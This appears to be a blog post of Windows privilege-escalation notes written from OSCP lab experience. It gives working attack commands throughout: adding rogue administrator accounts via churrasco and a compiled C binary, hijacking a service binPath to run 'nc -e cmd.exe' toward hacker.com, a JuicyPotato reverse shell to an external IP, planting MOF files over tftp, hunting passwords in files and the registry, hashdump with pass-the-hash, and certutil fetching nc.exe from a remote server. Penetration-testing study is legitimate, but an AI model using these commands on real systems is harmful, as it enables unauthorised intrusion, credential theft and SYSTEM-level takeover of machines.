Before you dig into it, I encourage you checking the following web site for your Windows Privilege Escalation.
https://www.fuzzysecurity.com/tutorials/16.htm
Privilege escalation on Windows platform was one of the hardest parts to me while my OSCP lab time. In my daily job and life, I don’t use Windows platform so often and am not familiar with it. I spent lots of time searching the related information on Google and try to organize all of my finding and do my best to note the scenario I encountered in OSCP lab to help the ones who need in any way.
\x01 Kernel Exploit
This is the most straightforward way for PE on Windows platform. You only have to check the Windows version and what service pack is used, and then just trial and error. Here comes two useful links.
https://411hall.github.io/assets/images/exploitexcel.png
\x02 Service run by SYSTEM or Administrator
Another way for PE on Windows is to exploit service run by SYSTEM or Administrator. The most well known service is Microsoft SMB service. MS17–010 or so called EternalBlue exploit which is developed by U.S. National Security Agency is the good chance to attack. You can use the builtin module in Metasploit or perform it manually. Please check the following 3 websites.
\x03 Windows 2003 / IIS6.0 with Network Service
While working on OSCP, you might encounter some machines running Windows 2003 with IIS6.0. You’re so luck to utilize Token Kidnapping exploit to add one user under Local Administrators Group.
> churrasco.exe “net user testuser password /add”
> churrasco.exe “net localgroup administrators testuser /add”
\x04 Search keywords in the files
You might think how stupid administrator records the password or credential information in the specific files!!! You got it. Please use the following two command to search for.
> dir /s *pass* == *cred* == *vnc* ==*.config*
> findstr /si password *.xml *.ini *.txt
\x05 Grep the registry for keywords
Lost of rich information resides in Windows registry. Searching the useful information will help you sometimes.
> reg query HKLM /f password /t REG_SZ /s
> reg query HKCU /f password /t REG_SZ /s
\x06 Access Check
The trick mentioned in this section is majorly performed on Windows XP. Windows XP? Are you kidding me? No, I am not. You know U.S. Navy is still using Windows XP and there is still the article discussing why the military can’t quit Windows XP over there. Use accesssschk.exe or cacls.exe(icacls.exe) to check whether “Authenticated User” has the RW access for one service or not.
> accesschk.exe /accepteula -uwcqv “Authenticated User”
> accesschk.exe /accepteula -ucqv “ServiceName”
> sc qc “ServiceName”
> sc config “ServiceName” binPath=”C:\nc.exe -nv hacker.com -e cmd.exe”
> sc config “ServiceName” obj=”./LocalSystem” password=””
> sc config “ServiceName” start=”demand”
> net start “ServiceName”
\x07 Check any Unquoted Service Path
This vulnerability occurs if a service executable path is not quoted and contains space. Imagine the following ImagePath of one Vulnerable Service.
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
Windows will look at the following paths in order and will run first EXE that it will find.
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Program.exe
C:\Program Files (x86)\Program Folder\A.exe
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
So if you have the write permission in any middle folder of the ImagePath. You could put your malicious binary into it. Below is the example which you can add testuser into Administrators group.
#include <stdio.h>
int main() {
int i;
i = system(“net localgroup administrators testuser /add”);
return 0;
}
If you don’t have the Windows machine to compile it, Cross-compiling is your good friend. Please use the following command.
#i686-w64-mingw32-gcc -o vulnerableService.exe useradd.c
And you can use the following command to search for any unquoted service.
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v “C:\Windows\\” | findstr /i /v “””
\0x08 MOF — Managed Object Format
This trick is used for one box running tftp service with directory traversal vulnerability and we can write files to any location. MOF file could be generated via Metasploit. There is one function called generate_mof in Msf::Exploit::WbemExec module. It’s basically a template for executing an EXE and cleaning up after itself. So please put your modified MOF into C:\Windows\system32\wbem\mof and kick off one listener, for example, nc -nlvp 1234 to get reverse shell. Here comes one example.
tftp>binary
tftp>put nc.exe /WINDOWS/system32/nc.exe
tftp>put bad.mof /WINDOWS/system32/wbem/mof/bad.mof
\x09 Sherlock
This is one PowerShell script to quickly find missing software patches for local PE vulnerabilities.
\x10 PowerShell Privilege Checker
This is the one aims for common Windows PE vectors that rely on misconfigurations. Please check the following repo to get more information.
\x11 Windows 10 Juicy Potato
This trick has it’s official name called Windows Net-NTLMv2 Reflection DCOM/RPC attack which could let you from a Windows Service Accounts to NT AUTHORITY/SYSTEM. First of all, check if your low privilege account has SeImpersonatePrivilege enabled. If it’s enabled, go to Github repo (https://github.com/ohpe/juicy-potato) to download JuicyPotato.exe and use the following command to create one bat file. Before you launch the attack, go checking your CLSID(https://github.com/ohpe/juicy-potato/tree/master/CLSID). Here comes the reference command:
> echo C:\Users\Rob\Desktop\nc.exe 192.168.123.123 12345 -e cmd.exe > rev.bat
> JuicyPotato.exe -l 9997 -p C:\Users\Rob\Desktop\rev.bat -t * -c {4991d34b-80a1–4291–83b6–3328366b9097}
From your attacking machine, use nc to listen on port 12345 to get reverse shell and then you will get one NT Authority/SYSTEM shell.
\x12 Metasploit
The last one and I think it’s the easiest one is to use Metasploit for PE. There are 3 methods below I used in the OSCP lab.
- If you ever got into one box with lower privilege via Metasploit, try executing hashdump to check if you could see the hash of Administrator. Lucky enough, pth-winexe will lead you the way.
- The second way you could try is to migrate to the process of NT Authority/SYSTEM
- The third way — the easiest way is to perform getsystem in Metasploit.
\x13 Another Useful Tool
At the end part of this article, I would like to mention one useful tool on Windows platform which is call certutil.exe. certutil.exe is a command-line program that is installed as part of Certificate Services. You can use certutil.exe to dump and display CA configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains. But this tool is also a useful tool for hackers to download malicious files on Internet and encode/decode those files. Here comes the examples:
- Download files from one web server
>certutil.exe -urlcache -split -f http://10.10.10.10/nc.exe - Calculate the hash of files
>certutil.exe -hashfile nc.exe SHA256
>certutil.exe -hashfile nc.exe MD5 - base64 encode/decode (This is much useful for the machine that is unable to connect to outside network and you still want to transfer file to this machine)
>certutil.exe -encode nc.exe nc.txt
>certutil.exe -decode nc.txt nc.exe
Reference
Some reference sites listed below. Hope you guys enjoy it.
